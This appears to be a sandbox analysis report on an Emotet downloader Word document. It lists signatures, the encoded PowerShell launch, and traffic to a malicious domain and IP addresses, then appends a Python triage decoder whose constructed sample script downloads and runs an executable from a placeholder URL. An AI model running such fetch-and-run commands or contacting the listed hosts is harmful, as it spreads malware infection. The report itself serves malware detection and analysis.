Analysis Report SecuriteInfo.com.Exploit.Siggen2.12183.28160.28092

Overview

General Information

Sample Name: SecuriteInfo.com.Exploit.Siggen2.12183.28160.28092 (renamed file extension from 28092 to doc)
Analysis ID: 255711
MD5: 3c20d0817d04e702fd5166fc3ce8594b
SHA1: a984d3e6856342ddc5d6bf48d7de645ba8084cc1
SHA256: 4b22feab70ea7d7acacbfaa93a8e2f6e0c3cd2520c63603caff2a970a78b1ea3

Detection

Emotet
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious encrypted Powershell command line found
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet Downloader
Creates HTML files with .exe extension (expired dropper behavior)
Creates processes via WMI
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA with many randomly named variables
Encrypted powershell cmdline option found
PowerShell case anomaly found
Very long command line found
Allocates a big amount of memory (probably used for heap spraying)
Contains long sleeps (>= 3 min)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 6048 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • powershell.exe (PID: 3804 cmdline: powersheLL -e [base64-encoded command line omitted] MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 4376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source: C:\Users\user\Documents\20200802\PowerShell_transcript.688098.pRHuXFXd.20200802001740.txt
Rule: PowerShell_Case_Anomaly
Description: Detects obfuscated PowerShell hacktools
Author: Florian Roth
Strings:
  • 0x23:$s1: PowerShell
  • 0xfd:$s1: powersheLL
  • 0xf9e:$s1: PowerShell
  • 0x23:$sr1: PowerShell
  • 0xf9e:$sr1: PowerShell
  • 0x23:$sn3: PowerShell
  • 0xf9e:$sn3: PowerShell
  • 0xff:$a1: wersheLL -e

Source: C:\Users\user\Documents\20200802\PowerShell_transcript.688098.pRHuXFXd.20200802001740.txt
Rule: JoeSecurity_EmotetDownloader
Description: Yara detected Emotet Downloader
Author: Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Source: winword.exe - Memory has grown: Private usage: 0MB later: 65MB
Source: global traffic - DNS query: name: www.hatchdogs.com
Source: global traffic - TCP traffic: 192.168.2.4:49717 -> 149.255.60.149:443
Source: global traffic - TCP traffic: 192.168.2.4:49716 -> 143.95.43.98:80

Networking:

Creates HTML files with .exe extension (expired dropper behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - File created: 744.exe.2.dr
Source: global traffic - HTTP traffic detected: GET /assets/XIw/ HTTP/1.1 Host: www.hatchdogs.com Connection: Keep-Alive
Source: global traffic - HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Host: www.hatchdogs.com
Source: unknown - DNS traffic detected: queries for: www.hatchdogs.com
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://lifecycle.office.com
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://login.microsoftonline.com/common
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://login.windows.local
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://management.azure.com
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://management.azure.com/
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://messaging.office.com/
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://ncus-000.contentsync.
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://officeapps.live.com
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://onedrive.live.com
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://retailer.osi.office.net/appstate/query
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: 744.exe.2.drString found in binary or memory: https://schema.org
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://settings.outlook.com
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 744.exe.2.drString found in binary or memory: https://stats.wp.com/e-202031.js
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://tasks.office.com
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: 744.exe.2.drString found in binary or memory: https://themegrill.com/themes/colormag
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: 744.exe.2.drString found in binary or memory: https://wordpress.org
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://wus2-000.contentsync.
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 744.exe.2.drString found in binary or memory: https://www.exactmetrics.com/
    Source: 744.exe.2.drString found in binary or memory: https://www.google-analytics.com/analytics.js
    Source: 744.exe.2.drString found in binary or memory: https://www.google.com/recaptcha/api.js?onload=cf7srLoadCallback&render=explicit
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/#organization
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/1-medium-mobile/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/65623583_1777682085698087_543777356850921472_n/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/?page_id=2266
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/booking/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/comments/feed/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/faqs-2/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/feed/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/logo-master/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/my-booking/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/photo-booth-hire/11-2/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/photo-booth-hire/9-2/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/photo-booth-hire/attachment/10632/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/photo-booth-hire/awards/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/photo-booth-hire/fun/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/photo-booth-hire/glitter/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/pricing/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/privacy-policy/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/reviews/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/t-cs/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/the-booth/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-admin/admin-ajax.php
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/contact-form-7-skins/css/framework/cf7s-default.css
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/contact-form-7-skins/css/framework/cf7s-normalize.c
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/contact-form-7-skins/skins/styles/vanilla/vanilla.c
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/contact-form-7/includes/css/styles.css
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/contact-form-7/includes/js/scripts.js
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/cookie-notice/css/front.min.css
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/cookie-notice/js/front.min.js
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/css/rating-display.css
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/css/rating-form.css
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/css/slider-controls-simp
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/js/controller.min.js
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/js/lib/actual/jquery-act
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/js/lib/form-validation/f
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/js/lib/strongslider/jque
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/js/lib/validate/jquery-v
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/js/lib/verge/verge.min.j
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/templates/default-form/form.css
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/templates/default/content.css
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/ultimate-faqs/css/ewd-ufaq-styles.css
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/ultimate-faqs/css/rrssb-min.css
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/youtube-embed/css/main.min.css
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/fontawesome/css/font-awesome.css
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/colormag-custom.js
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/fitvids/jquery.fitvids.js
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/html5shiv.min.js
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/jquery.bxslider.min.js
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/magnific-popup/jquery.magnific-popup.min
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/magnific-popup/magnific-popup.css
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/navigation.js
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/skip-link-focus-fix.js
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/sticky/jquery.sticky.js
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/style.css
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/uploads/2019/10/cropped-BAN333333.jpg
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-includes/js/dist/vendor/wp-polyfill-url.min.js
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-includes/wlwmanifest.xml
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-json/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.groovyboove.co.uk%2F
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.groovyboove.co.uk%2F&#0
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/xmlrpc.php?rsd
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: 744.exe.2.drString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
    Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443

    E-Banking Fraud:

    Malicious encrypted Powershell command line found
    Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powersheLL -e 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
    Yara detected Emotet Downloader
    Source: Yara match | File source: C:\Users\user\Documents\20200802\PowerShell_transcript.688098.pRHuXFX
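
The command line above is the evidence behind the "Malicious encrypted Powershell command line" signature: a mixed-case image name (powersheLL) followed by -e, the short form of -EncodedCommand, and a base64 payload that is long enough to trip the long-command-line signature. The following is an added triage example, not code from the Joe Sandbox report or from the sample: it decodes an -EncodedCommand payload (PowerShell expects base64 of UTF-16LE text, not UTF-8) and applies the same heuristics the report's signatures describe. The sample script, its placeholder URL, the 744.exe file name reuse and the length threshold are constructed for illustration; the real encoded payload is not reproduced in the report and is not used here.

```python
"""Decode and triage a PowerShell -EncodedCommand command line (added example)."""
import base64
import re

# First token of a Windows command line: a quoted path or a run of non-space characters.
_EXE_RE = re.compile(r'^\s*(?:"([^"]+)"|\'([^\']+)\'|(\S+))')

# Spellings a legitimate launcher produces; anything else with this stem is a case anomaly.
_LEGIT_NAMES = {"powershell", "powershell.exe", "PowerShell", "PowerShell.exe",
                "POWERSHELL", "POWERSHELL.EXE", "pwsh", "pwsh.exe"}

# Script-level indicators worth flagging once the payload is readable (illustrative set).
_SCRIPT_INDICATORS = {
    "downloader": re.compile(r"Net\.WebClient|DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b", re.I),
    "invoke-expression": re.compile(r"Invoke-Expression|\biex\b", re.I),
    "nested-base64": re.compile(r"FromBase64String", re.I),
    "process-launch": re.compile(r"Start-Process|\bsaps\b|\.Start\(", re.I),
}


def decode_encoded_command(payload: str) -> str:
    """-EncodedCommand carries base64 of the script encoded as UTF-16LE."""
    raw = base64.b64decode(payload + "=" * (-len(payload) % 4), validate=True)
    return raw.decode("utf-16-le")


def encode_command(script: str) -> str:
    """Inverse of decode_encoded_command; used only to build constructed samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def _is_encoded_flag(token: str) -> bool:
    # PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
    # -ep/-ex fail the prefix test and belong to -ExecutionPolicy.
    if len(token) < 2 or token[0] not in "-/":
        return False
    return "encodedcommand".startswith(token[1:].lower())


def analyze_cmdline(cmdline: str, long_threshold: int = 1000) -> dict:
    """Return the image name, triage findings and the decoded script (if any)."""
    result = {"binary": None, "findings": [], "decoded": None}
    m = _EXE_RE.match(cmdline)
    if not m:
        return result
    exe = next(g for g in m.groups() if g is not None)
    name = exe.replace("/", "\\").rsplit("\\", 1)[-1]
    result["binary"] = name
    stem = name.lower()[:-4] if name.lower().endswith(".exe") else name.lower()
    if stem in ("powershell", "pwsh") and name not in _LEGIT_NAMES:
        result["findings"].append("case-anomaly")

    tokens = cmdline[m.end():].split()
    for i, tok in enumerate(tokens):
        if _is_encoded_flag(tok) and i + 1 < len(tokens):
            result["findings"].append("encoded-command")
            try:
                result["decoded"] = decode_encoded_command(tokens[i + 1])
            except ValueError:  # covers binascii.Error and UnicodeDecodeError
                result["findings"].append("undecodable-payload")
            break

    # Threshold is an assumption; Emotet launchers of this era ran to thousands of characters.
    if len(cmdline) >= long_threshold:
        result["findings"].append("very-long-cmdline")
    if result["decoded"]:
        for label, rx in _SCRIPT_INDICATORS.items():
            if rx.search(result["decoded"]):
                result["findings"].append(label)
    return result


# Constructed sample in the style of the downloader the report describes. The URL is a
# placeholder (.invalid TLD) and is not an indicator taken from the analysis.
SAMPLE_SCRIPT = (
    "$u='http://example.invalid/wp-content/744.exe';"
    "$p=\"$env:TEMP\\744.exe\";"
    "(New-Object Net.WebClient).DownloadFile($u,$p);"
    "Start-Process $p"
)
SAMPLE_CMDLINE = "powersheLL -e " + encode_command(SAMPLE_SCRIPT)

if __name__ == "__main__":
    for key, value in analyze_cmdline(SAMPLE_CMDLINE).items():
        print(f"{key}: {value}")
```

The same decoder applies to the transcript the Yara rule matched: with PowerShell transcription enabled, the decoded script body is written to the transcript file in clear text, which is why the Yara match was raised on PowerShell_transcript.* rather than on the launching command line.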